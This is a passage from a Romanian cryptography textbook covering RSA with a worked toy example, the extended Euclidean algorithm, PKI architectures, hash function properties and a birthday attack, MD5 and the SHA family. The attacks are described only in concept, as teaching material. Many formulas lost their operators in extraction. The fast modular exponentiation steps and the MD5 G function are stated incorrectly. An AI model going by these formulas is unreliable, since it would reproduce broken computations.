RSA constă din următorii 3 algoritmi: generatorul de chei, algoritmul de criptare şi
algoritmul de decriptare.
1. Generatorul de chei:
 generează două numere prime mari p şi q;
 calculează n = pq şi indicatorul Euler φ(n) = (p − 1)(q − 1);
 alege aleator un număr e, astfel încât 1< e < φ(n) și cmmdc(e, φ(n)) = 1;
calculează d = e-1 mod φ(n), adică d  e = 1 mod φ(n)) folosind spre exemplu algoritmul
extins al lui Euclid;
 face public n şi e; astfel cheia publică este (e, n) iar cea privată este (d, n).

2
Adi Shamir (n. 1952, Tel Aviv, Israel) este un informatician și criptograf israelian, cu numeroase contribuții în
domeniul informaticii și criptanalizei, cunoscut mai ales pentru rolul său în dezvoltarea algoritmului de criptare cu chei
publice RSA și a schemei de indentificare Feige-Fiat-Shamir.
3
Leonard Max Adleman (n. 31 decembrie 1945, San Francisco, SUA) este un informatician și biolog american,
cunoscut mai ales pentru rolul său în dezvoltarea algoritmului de criptare cu chei publice RSA.

8
2. Algoritmul de criptare:
Fie m – mesajul în clar dat sub forma unui număr natural mai mic decât n (m poate fi
reprezentat zecimal în conformitate cu tabelul ASCII de codificare a caracterelor). Atunci
textul cifrat, notat cu c, este
c  m e mod n.
3. Algoritmul de decriptare:
Fie c – textul cifrat primit. Atunci textul clar m în reprezentarea numerică este
m  c d mod n,

după care, folosind aceeași metodă de codificare a caracterelor, se obține reprezentarea


originală a lui m.
Din motive de securitate, numerele întregi p și q ar trebui să fie alese la întâmplare și ar
trebui să fie similare ca mărime, dar să difere în lungime cu câteva cifre pentru a face factorizarea
lui n mai dificilă. În același timp este recomandată utilizarea unei chei n de cel puțin 2048 biți, iar
pe dispozitivele care permit – de 4096 biți, deoarece cheile de lungime mai mică sau deja pot fi
sparte sau ar putea fi în viitorul apropiat. În același timp publicația specială NIST privind
securitatea informatică (SP 800-78 Rev 1 din august 2007) nu permite fixarea exponentului cheii
publice e mai mici de 65537, dar nu menționează motivul acestei restricții.
Remarcă: pentru cifrurile care utilizează calculele modulo n trebuie ținut cont de faptul că în
cazul în care valoarea zecimală a lui m depăşeşte mărimea modulului n, se va diviza m în câteva
blocuri, care nu vor începe cu 0 și vor fi mai mici decât valoarea n a modului, apoi vor fi criptate
separat.

7.4.2. Algoritm de calculare rapidă a puterii modulo n


Pentru calcularea rapidă a lui a b mod n sunt elaborați mai mulți algoritmi, iar unul dintre
aceștia constă în următoarele:
 se determină reprezentarea binară a lui a;
 fiecărei unităţi din această reprezentare binară îi corespund operaţiile de ridicare la pătrat
urmată de înmulţirea cu baza (( x 2 mod n)  a) mod n , iar pentru fiecare 0 – numai înmulţirea
cu baza ( x  a) mod n , unde x este rezultatul obținut la pasul anterior;
 prima unitate din această reprezentare nu o luăm în considerare (pe primul loc
numaidecât se află 1și ((12 mod n)  a) mod n  a ), deci calculele le începem cu x=a și în
continuare operăm cu rezultatele curente obținute.

7.4.3. Algoritmul Euclid extins

9
Pentru calcularea inversului d al uni număr întreg e în clasele de resturi modulo n putem
aplica algoritmul Euclid extins, care poate fi reprezentat cu ajutorul tabelului 7.1. În acest tabel
avem:
x1  1, y1  0, r1  n, x2  0, y2  1, r2  e.

r 
qi   i 1 , i  2, 3, ... ,
 ri 
unde [x] reprezintă partea întreagă a numărului x. Pentru i  3, 4, 5 ... avem:
ri  ri  2 mod ri 1 , ,

xi  xi  2  qi 1  xi 1 ,

yi  yi  2  qi 1  yi 1 .

Procesul continuă până când obţinem r  1. În acest caz (la iteraţia k) e-1 mod n = yk. În
cazul în care yk < 0 se adună modulul n. De menționat că coloana care îi corespunde lui x nu este
necesară la calcularea inversului unui număr, ea fiind totuși parte a algoritmului Euclid extins și este
necesară pentru calcularea cmmdc a două numere în clasa modulo.
i x y r q
1 1 0 n
r 
2 0 1 a q2   1 
 r2 

r 
3 xi  xi  2  qi 1  xi 1 yi  yi  2  qi 1  yi 1 ri  ri  2 mod ri 1 q3   2 
 r3 
… … … … …
r 
k xk  xk  2  qk 1  xk 1 yk  yk  2  qk 1  yk 1 1 qk   k 1 
 rk 
Tabelul 7.1. Schema algoritmului Euclid extins
Notă: În cazul în care dispunem de un algoritm rapid de calcul al puterii modulo putem calcula
inversul modular folosindu-ne de formula
x 1 mod n  x n2 m od n.

7.4.4. Exemplu de utilizare RSA


Fie că Bob intenționează să facă schimb de mesaje criptate cu Alice. Pentru aceasta Bob
trebuie mai întâi să genereze o pereche de chei pentru algoritmul RSA şi să-i transmită lui Alice
cheia sa publică. Alice va cripta cu această cheie mesajul ‚A’ şi va trimite lui Bob textul cifrat, care,
folosind cheia sa privată, trebuie să-l decripteze.
Pentru generarea cheilor Bob alege 2 numere prime:
p = 31 şi q = 23.

10
Calculează produsul
n = 31 23 = 713.
Apoi calculează indicatorul Euler
φ(n) = (p − 1)(q − 1) = 30 22 = 660.
În continuare Bob alege aleator un număr e astfel ca 1 < e < φ(n) și cmmdc(e, φ(n)) = 1, adică
1<e<660 şi cmmdc(e, 660) = 1. Fie că el alege
e = 223.
-1
Calculează d = 223 mod 660 aplicând, spre exemplu, algoritmul Euclid extins (tabelul 7.2).
i y r q
1 0 660
2 1 223 2
3 -2 214 1
… 3 9 23
k –71 7 1
74 2 3
–293 1 2
Stop!
Tabelul 7.2. Schema algoritmului Euclid extins pentru d = 223-1 mod 660
Aşadar,
d = 223-1 mod 660 = –293 mod 660 = –293 + 660 = 367
Deci cheia privată (secretă) a lui Bob este SK=(367, 713).
Cheia sa publică PK= (223, 713) – Bob o transmite lui Alice.
Alice trebuie să trimită mesajul „A” lui Bob cifrând-ul cu algoritmul RSA. Conform tabelului
ASCII valoarea zecimală a lui „A” este 065=65. Deci m = 65. Pentru aceasta Alice calculează
c = 65223 mod 713,
aplicând algoritmul de calcul rapid al puterii modulare explicat mai sus. Reprezentarea binară a
exponentului 223 este:
22310 = 110111112.
Aşadar,
65223 mod 713  (((((((((((((652 mod 713)  65 mod n) 2 mod n) 2 mod n) 
 65 mod n) 2 mod n)  65 mod n) 2 mod n) 
 65 mod n) 2 mod n)  65 mod n) 2 mod n)  65 mod n).
Efectuând consecutive calculele se obţine
65 223 mod 713  396.
Alice trimite lui Bob textul cifrat
11
c  396.
Bob aplică aceeaşi metodă şi calculează
m  c d mod n  396 367  65 =065,
adică conform tabelului ASCII – litera „A”.
Dacă numărul n nu este suficient de mare, atunci algoritmul poate fi spart. În cazul nostru
n=713. Acest număr poate fi foarte simplu factorizat: n = 713 = 31 23. Atacatorul cunoaşte cheia
publică, deci ştie că e = 223 şi la fel ca Bob calculează d şi obţine cheia lui privată, spărgând astfel
algoritmul.

7.5. Infrastructura cheilor publice


Una dintre principalele probleme asociate cu criptografia este punerea cheilor private la
dispoziţia utilizatorilor autorizaţi, fără a le dezvălui altcuiva. Alte probleme principale includ
fixarea cheilor publice de entităţi, permiţând altor entităţi verificarea acestora, precum şi furnizarea
serviciilor necesare pentru gestionarea continuă a cheilor într-un sistem distribuit. Astfel a apărut
necesitatea de o infrastructură accesibilă care să organizeze circulația cheilor publice și anume -
Infrastructura Cheii Publice (sau PKI - Public key infrastructure). PKI poate accelera şi simplifica
livrarea produselor şi serviciilor prin oferirea de abordări electronice.

7.5.1. Noțiune de Infrastructura Cheii Publice


O infrastructură de chei publice este un set de roluri, politici și proceduri necesare pentru
crearea, gestionarea, distribuirea, utilizarea, stocarea și revocarea certificatelor digitale și
gestionarea criptării cu chei publice. Scopul unei PKI este de a facilita transferul electronic sigur de
informații pentru o serie de activități de rețea, cum ar fi comerțul electronic, Internet banking, e-
mailurile confidențiale, etc. PKI Este necesară pentru activitățile în care parolele simple sunt o
metodă inadecvată de autentificare și sunt necesare probe mai riguroase pentru a confirma
identitatea părților implicate în comunicare și pentru a valida informațiile transferate.
Termenul „infrastructura cheilor publice” este derivat din criptografia cu chei publice,
tehnologie pe care se bazează PKI. Ea are caracteristici unice care o fac nepreţuită ca bază pentru
funcţiile de securitate în sisteme distribuite. PKI este o combinaţie de software, tehnologii de
criptare şi servicii care permite organizaţiilor să protejeze securitatea comunicaţiilor şi a
tranzacţiilor lor de afaceri în reţele. PKI integrează certificatele digitale, criptografia cu cheie
publică şi autorităţile de certificare într-un set complet al unei arhitecturi de securitate cu un nivel
înalt de organizare.
Un exemplu tipic de PKI cuprinde: emiterea de certificate digitale pentru utilizatorii
individuali şi servere; software-ul necesar; instrumente de integrare a certificatelor; instrumente de
gestionare, de reînnoire, precum şi de retragere a certificatelor; servicii conexe şi de asistenţă.

12
Elementele funcţionale ale unei infrastructuri de chei publice includ autorităţile de
certificare (CA - certificate authority), autorităţile de înregistrare (Registration authority),
repozitorii şi arhive:
 o autoritate de certificare (CA), similar unui notar, eliberează sau revocă certificate;
 o autoritate de înregistrare (RA), o entitate care este încredinţată de CA să
înregistreze sau să garanteze asocierea dintre cheile publice şi identitatea titularului
certificatului cu o CA;
 un repozitoriu este o bază de date de certificate digitale active şi liste de revocare a
certificatelor (CRL - Certificate Revocation List) pentru un mediu specific al PKI;
 o arhivă este o bază de date de informaţii pentru a fi utilizate în soluţionarea
eventualelor viitoare litigii;
 utilizatorii PKI sunt organizaţii sau persoane care utilizează PKI, dar care nu
eliberează certificate.
O autoritate de certificare este componenta de bază a PKI, împreună cu o colecţie de
hardware, software şi oameni care le operează. CA este cunoscută după numele acesteia şi cheia sa
publică și îndeplineşte patru funcţii de bază ale PKI:
1. eliberează certificate;
2. menţine informaţii cu privire la starea certificatelor şi eliberează fişiere CRL;
3. publică certificate curente şi fişiere CRL;
4. menţine arhivele de informaţii despre starea certificatelor expirate care au fost
eliberate.
O autoritate de certificare emite un certificat digital pentru fiecare identitate, confirmând că
identitatea are prerogative corespunzătoare. Un certificat digital include de obicei cheia publică,
informaţii despre identitatea părţii care deţine cheia privată corespunzătoare, perioada de
funcţionare pentru certificat şi semnătură digitală proprie CA. Autoritatea trebuie, de asemenea, să
elibereze şi să prelucreze listele de revocare a certificatelor (fişiere CRL), care sunt niște liste de
certificate ce au fost revocate deja.
O autoritate de înregistrare este proiectată pentru a verifica conţinutul certificatului pentru
CA. Ca şi autoritatea de certificare, o RA este o colecţie de hardware, software, şi persoana sau
persoanele care le operează. Spre deosebire de CA, o RA va fi deseori exploatată de către o singură
persoană. Fiecare CA va păstra o listă de autorități de înregistrare acreditate; o RA este cunoscută
pentru CA după numele şi cheia publică ale acesteia.
Un repozitoriu este necesar pentru distribuirea certificatelor şi a informaţiilor cu privire la
starea certificatului. Acest repozitoriu reprezintă un mijloc de stocare şi distribuire a certificatelor,
precum şi de gestionare a actualizării certificatelor.

13
O arhivă acceptă responsabilitatea pentru stocarea pe termen lung a informaţiilor în favoarea
CA. O arhivă afirmă că informaţia a fost bună în momentul în care a fost primită, şi nu a fost
modificată în timp ce s-a aflat în arhivă. Arhiva protejează informaţiile prin intermediul unor
mecanisme tehnice şi proceduri adecvate în timp ce le are în grija sa. În cazul în care apare un
diferend cu privire la o semnătură la o dată ulterioară, aceste informaţii pot fi utilizate pentru a
verifica dacă cheia privată asociată cu certificatul a fost utilizată pentru a semna un document.
Utilizatorii PKI se bazează pe alte componente ale infrastructurii de chei publice ca să
obţină certificate şi să verifice certificatele altor entităţi cu care fac afaceri. Aceste entităţi includ:
 partea care se bazează pe certificat pentru ca să ştie, cu certitudine, cheia publică a
unei alte entităţi;
 titularul certificatului, adică partea care are eliberat un certificat şi poate semna
documente digitale.

7.5.2. Modele actuale de interoperabilitate PKI


Titularii de certificate îşi vor obţine certificatele de la Autorități de Certificare diferite, în
funcţie de organizaţia sau comunitatea în care ei sunt membri. Un PKI este de obicei compus din
mai multe CA legate prin căi de încredere. O cale de încredere leagă o parte de bază cu una sau mai
multe părţi terţe de încredere, astfel încât partea de bază poate avea încredere în valabilitatea
certificatului în uz. Există două arhitecturi tradiţionale PKI pentru a sprijini acest obiectiv,
arhitectura ierarhică şi arhitectura plasă. O a treia abordare, arhitectura CA pod a fost dezvoltată
pentru a se adresa situaţiei în care organizaţiile se confruntă în încercarea de a lega propriile PKI-uri
cu cele ale partenerilor lor de afaceri.
În PKI Ierarhice (Hierarchical Architectures) Autorităţile sunt aranjate ierarhic în cadrul
unei CA „rădăcină”, (root) care eliberează certificate la CA subordonate. Aceste CA pot elibera
certificate pentru CA sau utilizatori aflaţi mai jos în ierarhie. Într-un PKI ierarhic, fiecare parte de
bază cunoaşte cheia publică a CA rădăcină. Orice certificat poate fi verificat prin verificarea căii de
certificare a certificatelor de la CA rădăcină.

14
Figura 7.3. Modelul PKI ierarhic

Sistemele CA rădăcină pot avea încredere între ele, precum și între CA intermediare și cele
de tip frunză. O CA frunză este doar un CA care se află la sfârșitul unei rețele sau lanțuri CA.
Această structură permite a fi creativ și eficient la crearea sistemelor hibride.
În PKI Plasă (Mesh Architecture) CA independente se certifică reciproc (adică îşi eliberează
reciproc certificate), rezultând într-o plasă generală a relaţiei de încredere între CA egale. O parte de
bază ştie cheia publică a unei „CA apropiate”, în general, cea care a emis certificatul său. Partea de
bază verifică certificatul prin verificarea unei căi de certificare a certificatelor care duce de la CA de
încredere.

Figura 7.4. Modelul PKI plasă


15
PKI Pod (Single Architecture) a fost concepută pentru a conecta PKI-uri organizaţionale,
indiferent de arhitectura acestora. Acest lucru este realizat prin introducerea unei noi CA, numită
CA Pod, a cărui unic scop este de a stabili relaţii cu PKI-uri organizaţionale.

Figura 7.4. Modelul PKI pod

Spre deosebire de o CA Plasă, CA Pod nu eliberează certificate direct către utilizatorii finali.
Spre deosebire de o CA rădăcină într-o ierarhie, CA Pod nu este destinată utilizării ca un
punct de încredere. Toţi utilizatorii PKI considera CA Pod în calitate de intermediar. CA Pod
stabileşte relaţii punct cu punct cu diferite PKI organizaţionale. Aceste relaţii pot fi combinate
pentru a forma un pod de încredere de utilizatori conectaţi la PKI diferite.
Dacă domeniul de încredere este implementat ca un PKI ierarhic, CA Pod va stabili o relaţie
cu CA rădăcină. Dacă domeniul este implementat ca o PKI Plasă, podul va stabili o relaţie cu numai
una dintre CA. În ambele cazuri, CA care intră într-o relaţie de încredere cu podul este definită ca
fiind principala CA.

7.6. Întrebări și subiecte pentru aprofundarea cunoștințelor și lucrul individual


1. Care este particularitatea care deosebește criptarea cu chei publice de criptarea cu
cheie secretă?
2. Fie p = 97 și α = 5. Modelați schimbul de chei utilizând algoritmul Diffie-Hellman.
3. Fie p = 97 și α = 5. Modelați generarea cheilor, criptarea și decriptarea mesajului
M=’A’ aplicând algoritmul ElGamal.
4. Fie p = 97. Generați o pereche de chei pentru algoritmul RSA. Aplicând algoritmul
RSA realizați criptarea și decriptarea mesajului M=’A’. Comparați rezultatele cu
exempul precedent.
5. Descrieți infrastructura cheilor publice în RM. Justificați necesitatea existenței PKI.

16
TEMA 8: FUNCȚII HASH CRIPTOGRAFICE ȘI SEMNĂTURI DIGITALE

Obiectivele temei:
 Introducere în funcții hash criptografice și analiza standardelor de hashing.
 Introducere în semnături digitale și analiza celor mai utilizate scheme de semnare.

Cuvinte-cheie:
funcție hash, schema de semnătură RSA,
message-digest, schema de semnătură
coliziuni, ElGamal,
MD5, certificate digitale,
familia SHA, centru de certificare.
semnătură digitală,

Criptografia cu cheie secretă și cea cu cheie publică ajută la asigurarea confidențialității


informației. Al treilea tip de algoritmi criptografici îl constituie funcțiile hash criptografice, care
participă la asigurarea integrității și autenticității informației.

8.1. Funcții hash criptografice


Funcțiile hash criptografice joacă un rol fundamental în criptografia modernă. Cu toate că
sunt înrudite cu funcțiile hash convenționale, utilizate în mod obișnuit în aplicațiile informatice
non-criptografice, ele diferă în mai multe aspecte importante. Aici ne vom limita doar la funcțiile
hash criptografice (în continuare, pur și simplu funcții hash) și, în special, la utilizarea lor pentru
asigurarea integrității datelor și pentru autentificarea mesajelor.

8.1.1. Noțiuni generale și proprietăți ale funcțiilor hash


O funcție hash efectuează transformări asupra unei intrări de o lungime arbitrară generând o
ieşire de lungime fixă care este o imagine a intrării. Valoarea imaginii returnate se numeşte valoare
hash. Aceste funcţii se mai numesc şi funcţii „message digest”, adică „esența mesajului”, deoarece
din valoarea hash este imposibil de reconstruit intrarea din care s-a făcut imaginea. Există multe
funcţii care pot transforma intrarea de lungime arbitrară în o ieşire de lungime fixă, însă funcţiile
care prezintă interes din punct de vedere criptografic sunt funcţiile hash de sens unic (one–way hash
functions). Ecuaţia generală care descrie funcţiile hash este
h = H(m),
unde m este intrarea, H este funcţia şi h – valoarea hash.
Caracteristicile speciale ale funcţiilor de sens unic sunt următoarele:
 pentru orice intrare m este uşor de calculat h;
 având h este dificil de calculat m astfel încât se fie satisfăcută relaţia h = H(m);
 pentru un m dat este dificil de găsit m1 astfel încât H(m) = H(m1); în acest caz m și m1
sunt numite coliziuni.
Aceste proprietăţi ale funcţiilor hash de sens unic folosite în criptografie sunt extrem de
importante, deoarece dacă un atacator ar putea găsi cu uşurinţă o valoare de intrare m1 care produce
acelaşi rezultat cu m în cazul în care cineva semnează m, atacatorul ar putea afirma că a fost semnat
m1. O cerinţă adiţională pentru aceste funcţii este că pentru ele să fie dificil de găsit două mesaje
aleatoare care să aibă acelaşi imagine, altfel spus:
 este dificil de găsit mesajele aleatoare m şi m1 astfel încât H(m) = H(m1).
Un posibil atac, dacă ultima cerinţă nu este îndeplinită, ar fi atacul numit „atacul zilei de
naştere” (birthday atack). Acest tip de atac şi-a primit numele de la paradoxul zilelor de naştere. În
mod surprinzător (este dovedit matematic) probabilitatea ca în orice grup de 23 de persoane doi sau

mai mulţi indivizi să aibă acelaşi zi de naştere este mai mare decât 1 .
2
Atacul, descris de Bruce Schneier, presupune folosirea unei funcţii hash care produce un
rezultat de 64 biţi. Paşii care trebuie parcurşi pentru ca Bob să obţină o semnătură de la Alice pe un
document care n-ar fi semnat, în condiţii normale, niciodată de Alice sunt:
1. Bob pregăteşte două versiuni ale documentului, una care este în ordine şi va fi semnat de
Alice, şi una care conţine informaţii false care nu ar fi semnate de Alice;
2. Bob face schimbări subtile pe fiecare document (de ex. inserare de spaţii etc.), obţinând
223 variante ale documentelor;
3. Bob calculează valorile Hash a fiecărei variante ale celor două documente, şi găseşte
câte una din fiecare grup care produc aceleaşi valori hash;
4. Bob trimite varianta modificată a documentului pe care Alice este dispusă să semneze,
folosind un protocol unde se semnează numai valoarea hash;
5. Acuma Bob poate susţine că documentul pereche cu informaţiile false a fost semnată de
Alice.
Nu este uşor de găsit o funcţie care satisface toate cerinţele de mai sus, totuşi există destul
de multe, mai mult sau mai puţin sigure, funcţii hash folosite în criptografie. Mai jos urmează
descrierea succintă a unora dintre cele mai cunoscute astfel de funcţii.

8.1.2. Algoritmul MD5


MD5 (MD provine din Message Digest) este o funcţie hash de sens unic, proiectat de Ron
Rivest și face parte din seria MD de funcții hash: MD2, MD4, MD5, MD6. Algoritmul produce un
hash, sau altfel zis imagine, de 128 biţi a mesajului de intrare.
Principiile după care s-a realizat algoritmul sunt următoarele:

2
 Securitate. Este imposibil de găsit două mesaje care au aceiaşi imagine,
presupunând că nu există altă metodă de criptanaliză decât cea a forţei brute.
 Securitate directă. Securitatea nu se bazează pe presupuneri, cum ar fi de exemplu
dificultatea de a factoriza numere mari în cazul RSA.
 Viteză. Algoritmul trebuie să fie potrivit pentru implementări rapide de software,
bazându-se pe manipulaţii de bit cu operanzi de 32 biţi.
 Simplicitate şi compactitate. Algoritmul trebuie să fie cât se poate de simplu, fără
structuri mari de date sau un program complicat.
 Favorizare de arhitecturi Little-Endian. Algoritmul este optimizat pentru arhitecturi
de microprocesoare (mai ales Intel).
Variantă precedentă a algoritmului a fost MD4, dar acesta după ce a fost introdus a fost
criptanalizat cu succes, ce l-a îndemnat pe autor să-si îmbunătăţească codul. Astfel a fost conceput
MD5, ca variantă MD4 îmbunătăţită.
MD-5 este proiectat în baza construcției (funcției) hash Merkle–Damgard, o metodă de
elaborare a funcțiilor hash rezistente la coliziuni (figura 8.1). Astfel, după nişte procesări iniţiale
MD5 procesează textul de intrare în blocuri de 512 de biţi, care sunt mai departe separaţi în 16 sub-
blocuri de 32 biţi fiecare. Algoritmul produce un set de 4 blocuri de 32 biţi, care concatenate dau
ieşirea de 128 bit.

Figura 8.1. Shema construcției Merkle–Damgard

Mai detaliat, inițial mesajul este completat, iar lungimea finală a lui va fi un multiplul al lui
512. Acest procedeu se realizează adăugând un bit de 1 la sfârşitul mesajului şi atâtea zerouri câţi
sunt necesari pentru ca mesajul original să aibă o lungime cu 64 de biţi mai scurtă decât un multiplu
a lui 512. Biții rămași fiind completați cu 64 de biţi care reprezintă lungimea originală a mesajului
modulo 264. Acest procedeu asigură că completarea va arăta diferit pentru mesaje diferite.
Pentru calcule, sunt inițializate 4 variabile cu dimensiunea de 32 de biți, iar valorile inițiale
sunt date în cifre hexazecimale:
A = 0x01234567,
B = 0x89abcdef,
C = 0xfedcba98,
D = 0x76543210.
Starea inițială ABCD se numește vectorul de inițializare.
Cele patru variabile sunt copiate în alte variabile: A în a, B în b, C în c iar D în d.
3
De asemenea, sunt utilizate 4 funcții neliniare pentru patru runde și tabelul constantelor
T[1…64]:
F(X,Y,Z) = (X & Y) | ((!X) & Z),
G(X,Y,Z) = (X & Z) !(Y (!Z)),
H(X,Y,Z) = X xor Y xor Z,
I(X,Y,Z) = Y xor (X | (!Z)),
T[n]=int(232 abs|sin n|),
unde ’xor’, ’&’, ’|’ și ’!’ sunt operatorii logici pe biți XOR, AND, OR și NOT. Valiabilele X, Y și Z
sunt numite cuvinte, la fel și valorile fiecărei funcții.
Fiecare bloc de 512 biți trece prin patru cicluri de calcul a câte 16 runde fiecare. Pentru
aceasta blocul este reprezentat ca un vector X cu 16 cuvinte de 32 de biți fiecare. Toate rundele au
aceeași structură de forma [abcd k s i], definită în felul următor
a = b+((a + f(b, c, d)+X[k]+ T[i]) <<< s),
unde f este funcția neliniară utilizată la runda respectivă, k este indicele cuvântului de 32 de biți din
blocul curent de 512 de biți al mesajului, iar <<< s reprezintă deplasarea ciclică la stânga cu s biți a
argumentului de 32 de biți obținut. Numărul s este specificat separat pentru fiecare rundă.
În final rezultatul este copiat în una dintre variabilele inițiale A, B, C sau D (figura 8.2), iar
la după parcurgerea tuturor blocurilor vom obține valoarea hash-ului stocat în variabile ABCD în
formă hexazecimală.

Figura 8.2. Schema ciclului principal al MD5

Exemplu. Fie m=’Funcţii HASH’.


În acest caz MD5(m) =MD5(Funcţii HASH) = 8e31fb99ef4072b4d3d93014651eb13a, iar cei
128 de biți sunt reprezentați de cele 32 de cifre hexazecimale (32x4=128).

8.1.3. Familia SHA de funcții hash

4
SHA sau Secure Hash Algorithm este o familie de funcții hash criptografice publicate de
Institutul Național de Standarde și Tehnologie (NIST) ca standarde federale de procesare a
informației (FIPS), care include:
SHA-0: Un retronim aplicat versiunii originale a funcției hash pe 160 de biți publicată în
1993 sub numele „SHA”. Aceasta a fost retrasă la scurt timp după publicare din cauza unui „defect
semnificativ“ nedezvăluit și înlocuită cu versiunea ușor revizuită SHA-1.
SHA-1: O funcție de hash pe 160 de biți, care seamănă cu algoritmul MD5. Acesta a fost
proiectat de Agenția Națională de Securitate (NSA) să facă parte din DSA1 (Digital Signature
Algorithm). Pe parcurs au fost descoperite slăbiciuni criptografice ale SHA-1, iar standardul nu a
mai fost aprobat pentru majoritatea utilizărilor criptografice după 2010.
SHA-2: O familie de două funcții hash similare, cu dimensiuni diferite de blocuri, cunoscute
sub numele de SHA-256 și SHA-512, care diferă în dimensiunea variabilelor (cuvintelor); SHA-256
utilizează cuvinte pe 32 de biți, iar SHA-512 - pe 64 biți. Există, de asemenea și versiuni trunchiate
ale fiecărui standard, cunoscute sub numele de SHA-224, SHA-384, SHA-512/224 și SHA-
512/256, de asemenea proiectate de către ANS.
SHA-3: O funcție hash numită anterior Keccak, selectată în 2012 după o competiție publică
între dezvoltatori non-ANS. Acesta susține aceleași lungimi de hash ca și SHA-2, iar structura sa
internă diferă semnificativ de restul familiei SHA.
Standardele corespunzătoare acestei familii de funcții hash sunt: FIPS PUB 180 (SHA
original), FIPS PUB 180-1 (SHA-1), FIPS PUB 180-2 (SHA-1, SHA-256, SHA-384, SHA-512).
NIST are o versiune actualizată Draft FIPS 202, SHA-3, separată de standardul Secure Hash
Standard (SHS).

8.1.4. Algoritmul SHA-2


SHA-2 este utilizat la momentul de față în calitate de standard securizat pentru funcțiile hash
criptografice în SUA. El a fost aprobat în anul 2002, înlocuind vechiul algoritm SHA-1. Pe parcurs
a suferit câteva redactări, fiind adăugate și funcții hash noi. Ultima redactare a fost aprobată în anul
2012.

1
DSA (Digital Signature Algorithm) - Algoritmul pentru semnături digitale, este un standard al guvernului Statelor
Unite ale Americii pentru semnăturile digitale. A fost propus de National Institute of Standards and Technology (NIST)
în august 1991 pentru utilizare în cadrul standardului Digital Signature Standard (DSS), specificat în FIPS 186 și
adoptat în 1993. O revizie minoră a fost emisă în 1996 sub numele de FIPS 186-1 [1]. Standardul a fost extins în 2000
ca FIPS 186-2 [2] și în 2009 ca FIPS 186-3 [3].
5
Figura 8.3. Schema ciclului unei iterații SHA-2

Funcțiile hash ale familiei SHA-2 sunt construite pe baza construcției Merkle-Damgard (la
fel ca MD5 sau SHA-1), iar schema generală de funcționare este următoarea (figura 8.3):
 mesajul inițial se completează, apoi este împărțit în blocuri a câte 16 cuvinte;
 algoritmul parcurge fiecare bloc al mesajului completat printr-un ciclu cu 64 sau 80
de iterații (runde);
 la fiecare iterație sunt transformate 2 dintre cuvinte, restul participând la calcularea
funcției de transformare;
 rezultatele procesării fiecărui bloc sunt sumate, rezultatul fiind valoarea funcției hash.
În procesul de calculare a hash-ului algoritmul aplică următorii operanzi pe biți:
concatenarea, adunarea, AND, OR, XOR, SHR și ROOTR, unde SHR este deplasarea logică la
dreapta, iar ROOTR – deplasarea ciclică la dreapta.

8.1.5. SHA-3 - prezentare generală


În anul 2004 criptograful Xiaoyun Wang a descoperit un defect la SHA-1, care a redus în
mod drastic timpul necesar pentru a găsi o coliziune, făcând nesigure sistemele care utilizează acest
algoritm. La acel moment NIST aprobase deja succesorul lui SHA-1, familia de algoritmi SHA-
2, creând motive de îngrijorare că defectul s-ar putea extinde şi la acesta.
În anul 2007, după ce au început să apară temeri că algoritmii hash existenţi la acea vreme,
SHA-1 și SHA-2, ar putea fi defectuoşi, NIST a dat startul unui concurs pentru algoritmul care va
sta la baza noului standard SHA-3.
În timp ce cercetătorii de la NIST analizau cerinţele pentru competitorul SHA-3, aceştia au
constatat că algoritmul SHA-2 nu a fost viciat în modul presupus mai sus. În loc să întrerupă
proiectul de cercetare, NIST a decis că SHA-3 ar trebui să fie o opţiune complementară. Algoritmul
ideal ar avea o structură diferită criptografic, făcând mai puţin probabil ca un atac asupra SHA-2 să

6
afecteze de asemenea SHA-3. Mai mult chiar, acesta ar fi mai potrivit pentru o gamă mare de
dispozitive de calcul.
Dintr-un total de 64 de înregistrări care au avut loc iniţial, NIST a identificat cinci finalişti în
2010. Câştigătorul, algoritmul Keccak, se bazează pe o „construcţie hash de tip burete” (sponge
construction), numită astfel deoarece funcţia sa este flexibilă, asemeni unui burete fizic. Datele de
intrare într-o funcție hash sunt „absorbite” în faza de hashing şi apoi „stoarse” pentru a produce
hash. Într-o construcţie de tip burete, stoarcerea mai rapidă produce un hash mai rapid, dar mai
puţin sigur şi vice-versa, oferind flexibilitate.
Algoritmul nou este apreciat de unii specialiști ca fiind în general mai rapid decât
predecesorul său şi prin urmare consumă mai puţină energie, pe când alţi experţi în securitate sunt
mai puţin siguri de utilitatea unui nou algoritm. Având în vedere faptul că nu există nici o
vulnerabilitate evidentă a SHA-2, sistemele pot decide să utilizeze în continuare acest algoritm, mai
degrabă decât să îl schimbe. SHA-2 este încă un algoritm bun, dar poate SHA-3 ar fi mai eficient în
unele situaţii. NIST nu încurajează pe nimeni să abandoneze SHA-2 în favoarea SHA-3, deoarece
cei doi algoritmi sunt foarte buni, iar SHA-3 nu este mai bun decât SHA-2 pe toate planurile.

8.1.5. Aplicații ale funcțiilor hash


Funcțiile hash criptografice sunt în prezent pe larg utilizate ca identificator al fișierelor,
pentru verificarea parolelor, a integrității fișierelor sau a mesajelor, pentru, realizarea protocoalelor
proof-of-work, etc.
Verificarea integrității este una dintre aplicațiile practice importante ale funcțiilor hash, care
poate fi realiză prin compararea hash-ului mesajului (sau fișierului) calculat înainte și după
transmitere (sau după orice alt eveniment). Din acest motiv, majoritatea algoritmilor de semnătură
digitală doar confirmă autenticitatea hash-ului mesajului care urmează să fie „semnat”, verificarea
autenticității acestui hash fiind și dovada autenticității mesajului.
Hash-urile făcute cu MD5, SHA1 sau SHA2 sunt uneori afișate împreună cu fișierele
respective site-uri sau forumuri pentru a permite verificarea integrității. Această practică stabilește
un lanț de încredere atâta timp cât hash-urile sunt afișate pe un site autentificat de HTTPS.
Verificarea parolei este o aplicație înrudită cu verificarea integrității. Stocarea tuturor
parolelor utilizatorilor sub formă de text clar poate duce la o încălcare majoră a securității în cazul
în care fișierul cu parole este compromis. O modalitate de a reduce acest pericol este de a stoca doar
hash-ul fiecărei parole. Pentru a autentifica un utilizator, hash-ul parolei prezentată de utilizator este
comparat cu hash-ul stocat (această abordare însă împiedică recuperarea parolelor originale dacă
sunt uitate sau pierdute și trebuie înlocuite cu altele noi).
Înainte de aplicarea funcției hash parola este adesea concatenată cu o valoare aleatorie, non-
secretă, numită sare (salt), care este stocată împreună cu hash-ul. Sarea este, de fapt, o secvență de

7
caractere pe care o adăugăm parolei, astfel încât hash-ul să fie diferit. Astfel, chiar dacă doi
utilizatori ar alege aceeași parolă (fie ea și simplă), hash-urile lor ar fi diferite.
Aceste hash-uri sunt însă calculate foarte rapid și ar fi posibil un atac asupra unor parole
individuale. Pentru a împiedica acest lucru sunt utilizate funcții hash mai lente, cum sunt de
